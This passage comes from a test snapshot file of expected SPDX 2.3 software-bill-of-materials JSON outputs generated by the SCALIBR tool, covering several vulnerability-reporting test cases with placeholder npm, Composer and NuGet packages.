"relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", "SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", "SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", "SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/no_sources - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": 